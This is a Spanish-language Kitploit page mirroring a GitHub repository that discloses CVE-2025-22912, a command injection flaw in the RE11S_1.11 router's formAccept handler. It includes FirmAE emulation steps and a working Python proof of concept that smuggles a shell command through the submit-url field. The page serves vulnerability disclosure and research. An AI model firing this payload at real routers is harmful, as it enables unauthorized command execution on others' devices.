Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
RE11S_1.11-formAccept-CommandInjection — CVE-2025-22912 | Kitploit
Herramientas/GitHubGitHub/passwa11/re11s_1.11-formaccept-commandinjection
Seguridad de Sistemas EmbebidosSeguridad IoTAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebFuzzingPruebas de PenetraciónComando y Control

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
passwa11/re11s_1.11-formaccept-commandinjection

RE11S_1.11-formAccept-CommandInjection

CVE-2025-22912

Ver Repositorio
hace 1 añoAún no revisado

RE11S_1.11-formAccept-CommandInjection

Durante mi pasantía en Qi An Xin Tiangong Lab, descubrí una vulnerabilidad de inyección de comandos en el router RE11S_1.11.

Al analizar el archivo webs en el directorio bin, descubrí que la función formAccept contiene una vulnerabilidad de inyección de comandos.

La inyección de comandos se puede activar mediante el valor de la clave submit-url, lo que conduce a una inyección de comandos del sistema.

image-20241224100434040

Cómo podemos simular un router

Usa el siguiente comando para simular con firmAE.

root@kitploit:~
sudo ./run.sh -r v1 ~/IOT/RE11S_1.11/RE11S_1.11.bin

El contenido del archivo poc.py es el siguiente:

root@kitploit:~
import requests

url = "http://192.168.9.2/goform/formAccept"
data = {
	"submit-url":"touch /tmp/xyq"
}

r = requests.post(url,data=data)
print(r.text)

Resultado del ataque

image-20241224100515030

Se puede observar que se añade un archivo /tmp/xyq después de la ejecución, lo que demuestra que el ataque es exitoso.

Descargar herramienta